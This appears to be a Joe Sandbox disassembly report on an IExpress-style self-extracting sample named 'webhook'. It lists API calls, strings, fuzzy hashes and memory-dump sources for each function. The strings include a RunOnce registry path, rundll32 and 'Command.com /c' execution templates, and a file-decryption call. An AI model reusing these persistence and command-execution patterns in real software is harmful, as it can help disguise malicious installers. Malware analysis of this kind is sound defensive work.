Function 00007FF650541A08 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 181
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF650541A4A
memset.MSVCRT ref: 00007FF650541A58
RegCreateKeyExA.KERNELBASE ref: 00007FF650541A98
RegQueryValueExA.KERNELBASE ref: 00007FF650541AEE
RegCloseKey.ADVAPI32 ref: 00007FF650541B0C
GetSystemDirectoryA.KERNEL32 ref: 00007FF650541B2A
LoadLibraryA.KERNELBASE ref: 00007FF650541B4C
GetProcAddress.KERNEL32 ref: 00007FF650541B6E
FreeLibrary.KERNELBASE ref: 00007FF650541B84
GetSystemDirectoryA.KERNEL32 ref: 00007FF650541B9F
LocalAlloc.KERNEL32 ref: 00007FF650541BFC
GetModuleFileNameA.KERNEL32 ref: 00007FF650541C3F
RegCloseKey.ADVAPI32 ref: 00007FF650541C58
RegSetValueExA.KERNELBASE ref: 00007FF650541CC6
RegCloseKey.KERNELBASE ref: 00007FF650541CD7
LocalFree.KERNEL32 ref: 00007FF650541CE6

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF650541A69
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF650541C73
%s /D:%s, xrefs: 00007FF650541C87
advpack.dll, xrefs: 00007FF650541B36
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650541BC6
wextract_cleanup%d, xrefs: 00007FF650541AB5
DelNodeRunDLL32, xrefs: 00007FF650541B64
wextract_cleanup0, xrefs: 00007FF650541AC1, 00007FF650541ADC, 00007FF650541CAB

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 1522771004-3726664654
Opcode ID: 4787bf835d2d00f0f2994409a2d2f4fd237c0eb5fe9aa116df46f60fe985a84b
Instruction ID: cfe498abbf5cb72c1e87af6f42a38d3143d12d01129da7767c1dc60048c3e583
Opcode Fuzzy Hash: 4787bf835d2d00f0f2994409a2d2f4fd237c0eb5fe9aa116df46f60fe985a84b
Instruction Fuzzy Hash: 83816D36A18B83B6E7108F21E9442F9BBA0FB89B54F885235DA8E93754DF3CD525C700

Function 00007FF650541D28 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 373
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CompareStringA.KERNEL32 ref: 00007FF650541EDA
GetFileAttributesA.KERNEL32 ref: 00007FF650541EF4
LocalAlloc.KERNEL32 ref: 00007FF650541F5F
GetPrivateProfileIntA.KERNEL32 ref: 00007FF650541F9E
GetPrivateProfileStringA.KERNEL32 ref: 00007FF650541FE2
GetShortPathNameA.KERNEL32 ref: 00007FF650542094

Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8

Strings

.BAT, xrefs: 00007FF650542118
.INF, xrefs: 00007FF650541EBC
setupapi.dll, xrefs: 00007FF6505420A2
setupx.dll, xrefs: 00007FF65054208D
DefaultInstall, xrefs: 00007FF650541F7C
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00007FF6505420B7
Reboot, xrefs: 00007FF650541F8B
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650541E52
AdvancedINF, xrefs: 00007FF650541FCC
Command.com /c %s, xrefs: 00007FF650542147
Version, xrefs: 00007FF650541FD3

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-3544074861
Opcode ID: 2e4a39167a847aef4def7ff9a37549632115461138b4cb5282ed996653afc72e
Instruction ID: 2a14acd2c4301719ebf569a3388f1aa8ab5e6c888ce69478441f125402fd3f0d
Opcode Fuzzy Hash: 2e4a39167a847aef4def7ff9a37549632115461138b4cb5282ed996653afc72e
Instruction Fuzzy Hash: 40F1AD62A08783B5EB218F24E6442F97BA0FB45784F9C4135DA8EA7795DF3DE529C300

Function 00007FF65054521C Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

LocalAlloc.KERNEL32 ref: 00007FF650545268
lstrcmpA.KERNEL32 ref: 00007FF650545307
LocalFree.KERNEL32 ref: 00007FF65054532E
LocalFree.KERNEL32 ref: 00007FF6505452E5

Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8

Part of subcall function 00007FF650546590: GetLastError.KERNEL32 ref: 00007FF650546594

GetTempPathA.KERNEL32 ref: 00007FF6505453BA
GetDriveTypeA.KERNEL32 ref: 00007FF650545456
GetFileAttributesA.KERNEL32 ref: 00007FF650545473
GetDiskFreeSpaceA.KERNEL32 ref: 00007FF6505454CB
MulDiv.KERNEL32 ref: 00007FF6505454EE
GetWindowsDirectoryA.KERNEL32 ref: 00007FF650545562
GetFileAttributesA.KERNEL32 ref: 00007FF650545587
CreateDirectoryA.KERNEL32 ref: 00007FF65054559F
SetFileAttributesA.KERNEL32 ref: 00007FF6505455CF
GetWindowsDirectoryA.KERNEL32 ref: 00007FF65054563B

Part of subcall function 00007FF6505464B0: FindResourceA.KERNEL32 ref: 00007FF6505464DA
Part of subcall function 00007FF6505464B0: LoadResource.KERNEL32 ref: 00007FF6505464F1
Part of subcall function 00007FF6505464B0: DialogBoxIndirectParamA.USER32 ref: 00007FF650546527
Part of subcall function 00007FF6505464B0: FreeResource.KERNEL32 ref: 00007FF650546539

Strings

<None>, xrefs: 00007FF6505452FD
A:\, xrefs: 00007FF650545405
msdownld.tmp, xrefs: 00007FF65054556E
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6505453A7
RUNPROGRAM, xrefs: 00007FF650545250, 00007FF6505452B1
Z, xrefs: 00007FF650545446

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 3973824516-2740620654
Opcode ID: 0e9c0d44473e389c0dba35f6887952c7f16077fbc144747ce04e5fe7671e664c
Instruction ID: 11f65f71446649d94d2f855af97fc74f4830e9f5840f31d9b1a5e15e0b93e4ce
Opcode Fuzzy Hash: 0e9c0d44473e389c0dba35f6887952c7f16077fbc144747ce04e5fe7671e664c
Instruction Fuzzy Hash: ACD16F32A1C683B6EB108F2096503FA77A1FB85744F984035DA8DA7796DF7DE825CB00

Function 00007FF650545810 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF65054586B
memset.MSVCRT ref: 00007FF65054587F

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

CreateEventA.KERNEL32 ref: 00007FF6505458BC
SetEvent.KERNEL32 ref: 00007FF6505458D2
CreateMutexA.KERNEL32 ref: 00007FF650545965
GetLastError.KERNEL32 ref: 00007FF650545981
FindResourceExA.KERNEL32 ref: 00007FF650545A4C
LoadResource.KERNEL32 ref: 00007FF650545A63

Part of subcall function 00007FF650543DF0: GetVersionExA.KERNEL32 ref: 00007FF650543E3B

#17.COMCTL32 ref: 00007FF650545A7A
CloseHandle.KERNEL32 ref: 00007FF6505459E7

Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8

Strings

, xrefs: 00007FF6505459CE
EXTRACTOPT, xrefs: 00007FF6505458E9
VERCHECK, xrefs: 00007FF650545A42
INSTANCECHECK, xrefs: 00007FF650545943
TITLE, xrefs: 00007FF65054589A

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
API String ID: 3100096412-3293887400
Opcode ID: 16d8403d54d1fdd36c1b43328a74255bed5f48863335dcf266409fc29e1c7d7d
Instruction ID: 249137ccc2847e6344717b9d4ffc3559a866689710d24be716e7bb76b807d863
Opcode Fuzzy Hash: 16d8403d54d1fdd36c1b43328a74255bed5f48863335dcf266409fc29e1c7d7d
Instruction Fuzzy Hash: 86816831A08643B6F7609B21AA413F97A90EF85784F4C5135D9CEE67A6DF7CE524CB00

Function 00007FF650545B50 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32 ref: 00007FF650545BA9
SetCurrentDirectoryA.KERNELBASE ref: 00007FF650545BB8

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650545B66

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CurrentDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1611563598-305352358
Opcode ID: 4926850c6f80b5d2401089667c5e764d4b6a610568242aaae11311db6a7c54a3
Instruction ID: 02aaff83cfa67b2fc341332a7b963a1b9a08e9e02699fd06e5b3ba4dbea5cdfc
Opcode Fuzzy Hash: 4926850c6f80b5d2401089667c5e764d4b6a610568242aaae11311db6a7c54a3
Instruction Fuzzy Hash: 38A18036A08B43B7E7208F20E5446EA7BA4FB89744F484135DA8D93B55DF7CD529CB00

Function 00007FF650544BE0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C10
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C21
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C30
GetDlgItem.USER32 ref: 00007FF650544C5D
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C6E
GetDlgItem.USER32 ref: 00007FF650544C86
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C9A
#20.CABINET ref: 00007FF650544D0D
#22.CABINET ref: 00007FF650544D53
#23.CABINET ref: 00007FF650544D68
FreeResource.KERNEL32 ref: 00007FF650544DB1
SendMessageA.USER32 ref: 00007FF650544E13

Strings

CABINET, xrefs: 00007FF650544BED, 00007FF650544C07
*MEMCAB, xrefs: 00007FF650544D44

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 3b69f308e7aff4aa40f139636aa249b22d78b8fd704426b43be783c743a20795
Instruction ID: 8ebc9e86fcc889506f7d76434fd4e63e6015fc2f2d348ba3ed42a0d14adfe690
Opcode Fuzzy Hash: 3b69f308e7aff4aa40f139636aa249b22d78b8fd704426b43be783c743a20795
Instruction Fuzzy Hash: 67512831A08B43B6EB519B10EA553F97AA0FF89745F889135C98EA3754EF3CE125CB40

Function 00007FF6505446E8 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 152
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32 ref: 00007FF650544763
LoadLibraryA.KERNEL32 ref: 00007FF650544787
GetProcAddress.KERNEL32 ref: 00007FF6505447A5
DecryptFileA.ADVAPI32 ref: 00007FF6505447C9
FreeLibrary.KERNEL32 ref: 00007FF6505447D2
GetWindowsDirectoryA.KERNEL32 ref: 00007FF650544803

Part of subcall function 00007FF6505456C8: LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF65054471F), ref: 00007FF6505456ED

Strings

DecryptFileA, xrefs: 00007FF65054479B
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6505447C2, 00007FF650544879
advapi32.dll, xrefs: 00007FF65054476F

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 3010855178-1173327654
Opcode ID: 9e27674a5b51a4a5e159182f73ecc04bd5b4a3d1429c667e6920d42d51a7d13c
Instruction ID: 3b39ab4a5c7cb1a281a0addccb0c10d8207ebd2bb8930e416a5726fe07e8831b
Opcode Fuzzy Hash: 9e27674a5b51a4a5e159182f73ecc04bd5b4a3d1429c667e6920d42d51a7d13c
Instruction Fuzzy Hash: 91711A21E4CA83B6FA629B21EB413FA3694EF95744F4C4035D9CDE2391EF6CE465CA00

Function 00007FF650544BDE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C10
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C21
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C30
GetDlgItem.USER32 ref: 00007FF650544C5D
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C6E
GetDlgItem.USER32 ref: 00007FF650544C86
ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C9A
FreeResource.KERNEL32 ref: 00007FF650544DB1
SendMessageA.USER32 ref: 00007FF650544E13

Strings

CABINET, xrefs: 00007FF650544BED, 00007FF650544C07

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: CABINET
API String ID: 1305606123-1940454314
Opcode ID: 8e442914da32c2caf3f36bfd7032b2ad0c86f0f2f3ea85e4199e9b1ccdfcff45
Instruction ID: 89ce1697dea60ef18126ed10b5371db1c1ae2fcde716da8d796069385b515d4d
Opcode Fuzzy Hash: 8e442914da32c2caf3f36bfd7032b2ad0c86f0f2f3ea85e4199e9b1ccdfcff45
Instruction Fuzzy Hash: 38416D31E08A43B6FB559B20EA553F56AA0FF89745F4C8139CD8EA7791DF3DE0648A00

Function 00007FF6505441EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF65054807B), ref: 00007FF650544337

Part of subcall function 00007FF650544FD8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF65054807B), ref: 00007FF650545074
Part of subcall function 00007FF650544FD8: GetFileAttributesA.KERNELBASE ref: 00007FF650545083
Part of subcall function 00007FF650544FD8: GetTempFileNameA.KERNEL32 ref: 00007FF6505450B0
Part of subcall function 00007FF650544FD8: DeleteFileA.KERNEL32 ref: 00007FF6505450C8
Part of subcall function 00007FF650544FD8: CreateDirectoryA.KERNEL32 ref: 00007FF6505450D9

GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF65054807B), ref: 00007FF650544284
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF65054807B), ref: 00007FF650544390

Strings

alpha, xrefs: 00007FF6505442B1
mips, xrefs: 00007FF6505442BA
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650544230, 00007FF6505442E7
ppc, xrefs: 00007FF6505442A8
i386, xrefs: 00007FF6505442C3

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-3374052426
Opcode ID: b3051c44cdf2447e8502c622c0c4218f7f53285f7723d54c605f1a77c6be6c0c
Instruction ID: 3629caad99a1855eead12735ac1dcf53e8425612aa4a5c48ee4ee1a41b981f6f
Opcode Fuzzy Hash: b3051c44cdf2447e8502c622c0c4218f7f53285f7723d54c605f1a77c6be6c0c
Instruction Fuzzy Hash: B0517B65A4C683B2FA568F15AA043F967A0AF85B44F9C4135DDCDA3791EF7CE424CB00

Function 00007FF650547FE4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 81
libraryloadershutdownCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32 ref: 00007FF650547FF9
GetModuleHandleW.KERNEL32 ref: 00007FF650548016
GetProcAddress.KERNEL32 ref: 00007FF650548031
ExitWindowsEx.USER32 ref: 00007FF6505480E7
CloseHandle.KERNEL32 ref: 00007FF650548106

Strings

Kernel32.dll, xrefs: 00007FF65054800F
HeapSetInformation, xrefs: 00007FF650548027
@, xrefs: 00007FF6505480C0

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Handle$AddressCloseExitModuleProcVersionWindows
String ID: @$HeapSetInformation$Kernel32.dll
API String ID: 1302179841-1204263913
Opcode ID: 83a8c1ea104aff54c4d7c9c4dbf1586e791a1727480c60f852360176ee8197a3
Instruction ID: 63768d80170d94b8771831b43e269f02e09108ffb3dd61eb60062a23929a1dd3
Opcode Fuzzy Hash: 83a8c1ea104aff54c4d7c9c4dbf1586e791a1727480c60f852360176ee8197a3
Instruction Fuzzy Hash: 4031A331E18643F6FB609B50A6492F976A0EF49B84F4C8435DA8EE3395CF7CE469C600

Function 00007FF6505426B8 Relevance: 12.1, APIs: 8, Instructions: 121filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE ref: 00007FF65054275A
lstrcmpA.KERNEL32 ref: 00007FF6505427B9
lstrcmpA.KERNEL32 ref: 00007FF6505427D9
SetFileAttributesA.KERNEL32 ref: 00007FF650542832
DeleteFileA.KERNEL32 ref: 00007FF650542842
FindNextFileA.KERNELBASE ref: 00007FF650542856
FindClose.KERNELBASE ref: 00007FF65054286D
RemoveDirectoryA.KERNELBASE ref: 00007FF65054287C

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 18f7d0d8df672b7f8ff2bc21405c924839be97c8656361e9f06e7a67ef0dde56
Instruction ID: 0e4108f0062efb409d5d62d0c52914c3de0659becd214f6f6de76ada4684775c
Opcode Fuzzy Hash: 18f7d0d8df672b7f8ff2bc21405c924839be97c8656361e9f06e7a67ef0dde56
Instruction Fuzzy Hash: 4C514B76618B87B6EB118F20D9042E97BA1FB46B94FC88571CA8DA3795DF3CE519C300

